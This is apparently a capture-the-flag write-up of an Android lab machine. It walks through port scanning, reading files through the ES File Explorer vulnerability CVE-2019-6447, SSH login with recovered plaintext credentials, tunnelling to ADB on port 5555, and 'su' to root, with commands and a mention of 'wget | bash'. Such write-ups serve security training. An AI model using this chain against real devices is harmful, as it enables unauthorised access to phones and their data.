Work flow

Summary
This was a beginner friendly machine with a steady workflow flow and no major obstacles. For the enumeration phase all ports had to be scanned in order to identify the correct attack vector. Following, a simple file traversal exploit on an ES file explorer server provides you with credentials after some looking around. These credentials allow for an SSH connection to the target server. From here we are able to port forward over ssh to access a filtered port and piggy back off this connection over ssh to use the ADB debugger to connect to the target with elevated privilege's and then expand into Administrator.
Tools used
nmap
autorecon
SSH pass
wget
linpeas
ADB
Processes/techniques
File traversal exploit
SSH port forwarding
Android OS ADB and ES File Explorer
References
https://www.cyberciti.biz/faq/unix-linux-check-if-port-is-in-use-command/
https://dev.to/exadra37/android-devices-being-shipped-with-tcp-port-5555-enabled-1ig5
Phase 1 - Enumeration
Starting off with a basic nmap scan we find only two ports.

Diving a little deeper and scanning all the ports reveals a wider attack surface, .

Performing an in depth port scan on those listed ports greatly expands our attack surface once again. (See nmap -sC -sV output below)
└─$ nmap 10.129.209.183 -sC -sV -p 2222,5555,38291,42135,59777
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-11 12:34 EST
Nmap scan report for 10.129.209.183
Host is up (0.098s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
5555/tcp filtered freeciv
38291/tcp open unknown
| fingerprint-strings:
| GenericLines:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:34:51 GMT
| Content-Length: 22
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| GetRequest:
| HTTP/1.1 412 Precondition Failed
| Date: Thu, 11 Nov 2021 17:34:51 GMT
| Content-Length: 0
| HTTPOptions:
| HTTP/1.0 501 Not Implemented
| Date: Thu, 11 Nov 2021 17:34:57 GMT
| Content-Length: 29
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Method not supported: OPTIONS
| Help:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 26
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line: HELP
| RTSPRequest:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:34:57 GMT
| Content-Length: 39
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| valid protocol version: RTSP/1.0
| SSLSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 73
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ?G???,???`~?
| ??{????w????<=?o?
| TLSSessionReq:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 71
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
| ??random1random2random3random4
| TerminalServerCookie:
| HTTP/1.0 400 Bad Request
| Date: Thu, 11 Nov 2021 17:35:12 GMT
| Content-Length: 54
| Content-Type: text/plain; charset=US-ASCII
| Connection: Close
| Invalid request line:
|_ Cookie: mstshash=nmap
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port2222-TCP:V=7.91%I=7%D=11/11%Time=618D543C%P=x86_64-pc-linux-gnu%r(N
SF:ULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port38291-TCP:V=7.91%I=7%D=11/11%Time=618D543B%P=x86_64-pc-linux-gnu
Phase 2 - Enumeration ES File Explorer & pivot into Initial foothold
Noticing the banner "ES File Explorer" I jumped over to google and
reviewed and researched the purpose and function of ES file explorer. I looked for vulnerabilities on exploit-db and came across the one below and it actually worked with a copy + paste on the first go. No modification required.
The exploit allows the individual to read files and nothing more. Several command line arguments are available to us.
Available commands
listFiles
listPics
listVideos
listApps
listAppsSystem
listAppsPhone
listAppsSdcard
listAppsAll
getFile
getDeviceInfo
After much searching around I finally listed the "Pics" where I found a photo of credentials.
Here was the output below.
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
Here we see the photo creds.jpg which is exactly what we need to progress!

kristi:Kr1sT!5h@Rp3xPl0r3!
Phase 3 - Initial foothold
We connect in with SSH over port 2222 as Kristi and land a very limited shell.
Looking around we eventually make our way into the sdcard directory and find the user.txt.


I was able to upload linpeas, however the file is restricted to root every time and I cannot change
Having failed with my previous attempt to execute linpeas, I attempted to execute directly in memory and this did not work either (With wget | bash)the permissions). From here I attempted to escalate the shell to python and this did not work.
Permissions are not on our as seen in the below photo.

Manual enumeration
At this point I pulled up some linux priv esc manual enumeration sheets and using uname -a helped clarify the version of Android we were running. Netstat however provided a great clue for our next move.
127|:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $
netstat was not working but netstat -tulpn worked!

Seeing that port 5555 was open and listening on the inside, while being filtered from the outside I eventually clued in after far to long that this was something worth investigating.
Looking up android port 5555 we learn that Android devices are actually being shipped with port TCP 5555 enabled.
Phase 4 - Escalate to root
For this phase of the engagement our goal is to access port 5555 which has to be done through the ADB debugger. This was very interesting as I guess all android devices are designed to communicate with an ADB debugger as a way of providing highly customizable features and system commands for developers.
To forward the port I had initially tried SSH which provided many issues so I switched to SSH- pass allowing me to store the password persistently. Sometimes if a password prompt is required it can timeout your sessions while operating out of the command line. The command line cannot always receive a popup designed for the desktop (GUI). SSHpass solves this.
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -L5555:localhost:5555 kristi@10.129.209.183 -p 2222
From here we connect the ADB debugger which we installed from command line to our target over port 2222 -> 5555. This is performed with the ADB connect command.
ADB connect 10.129.209.183:5555

From here we confirm that ADB is connected with the following command.
adb devices
Then we call an Android system shell with the ADB command below.
adb shell
Phase 4 - Root
This was actually quite embarrassing and just using the SU command to switch from the shell user to root won the day.
Comments